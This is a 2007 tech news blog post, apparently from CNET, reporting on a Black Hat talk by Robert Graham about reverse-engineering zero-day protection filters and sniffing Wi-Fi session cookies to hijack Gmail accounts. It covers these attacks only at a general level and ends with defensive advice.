• On TV.com: TOP 10 Shows CANCELED Too Soon

News Blog

Read all 'Robert Graham' posts in News Blog
August 2, 2007 3:38 PM PDT

Researcher: Web 2.0 vulnerable to cookie theft

by Robert Vamosi
  • 3 comments

LAS VEGAS--Robert Graham of Errata Security on Thursday showed how reverse engineering your security application can uncover a treasure trove of zero-day vulnerabilities. He also demonstrated a new man-in-the-middle attack scenario that affects several popular Web 2.0 sites. He did so in a talk at Black Hat titled "The Lazy Hacker's Guide to TCB (Taking Care of Business)."

David Maynor who is no stranger to controversy at Black Hat was scheduled to speak alongside Graham, but Maynor was called away at 4 a.m. by a client in need. Errata CEO Graham presented the talk solo.

In part one, Graham talked about hacking into TippingPoint's Zero Day Initiative. The Zero Day Initiative is a program where researchers are paid for new, undisclosed vulnerabilities. What Maynor and Graham found was that TippingPoint then sent out protection to its clients, protection that could be reverse-engineered, thus revealing the vulnerability. This happens with Microsoft patches as well; the difference is that these vulnerabilities haven't been made public. The methods shown in the Black Hat talk have since been fixed by TippingPoint, but Graham pointed out that the same processes could be used by other zero-day marketplaces, such as those by eEye and IBM ISS.

In the second part of the talk, Graham showed how he could wirelessly sniff the session cookies used by Web 2.0 sites such as Google Gmail, Facebook and MySpace.com. He said that these sites seem to ignore the fact that sniffing for session cookies has been around for years. As an example, during the talk, he sniffed the wireless in the room at Black Hat, and from those results, was able to pull out a session cookie for Gmail. Within minutes, he displayed, quickly, that person's Gmail account on the project screen. By doing this, he could send messages as that person, read all the mail in the account, change the settings, such as changing the sender message to "I love sheep," or change the screen colors. What he can't do is change the password on the account.

Graham said Gmail allows you to choose "https" protection, and urged everyone to do so. He said Facebook and other Web 2.0 sites don't offer that, making the theft of the session a possibility. For that, simply do not use those accounts in a public Wi-Fi setting, such as an Internet cafe or airport waiting area.

Topics:
Security
Tags:
security,
Black Hat 2007,
Robert Graham
Share:
Digg
Del.icio.us
Reddit
  • prev
  • 1
  • next
advertisement

Google's mobile hopes go beyond Nexus One

The world may have thrilled to the potential for a Google Phone, but what Google actually unveiled is its plan for a new smartphone world order.
• Photos: Unboxing Nexus One

Using your smartphone safely

faq Worms, Trojans, and SMS attacks are risks for mobile phones, but the biggest practical threat to users is losing the device.

About News Blog

Recent posts on technology, trends, and more.

Add this feed to your online news reader



advertisement

Inside CNET News

Scroll Left Scroll Right
News
News site map
Latest headlines
Contact News
News staff
Corrections
CNET blogs
Popular topics
Apple iPhone
Apple iPod
Cell phones
CES 2010
GPS
LCD TV
CNET sites
CNET Site map
CNET TV
Downloads
News
Reviews
Shopper.com
More information
Newsletters
CNET Mobile
Customer Help Center
RSS
CNET Widgets
About CNET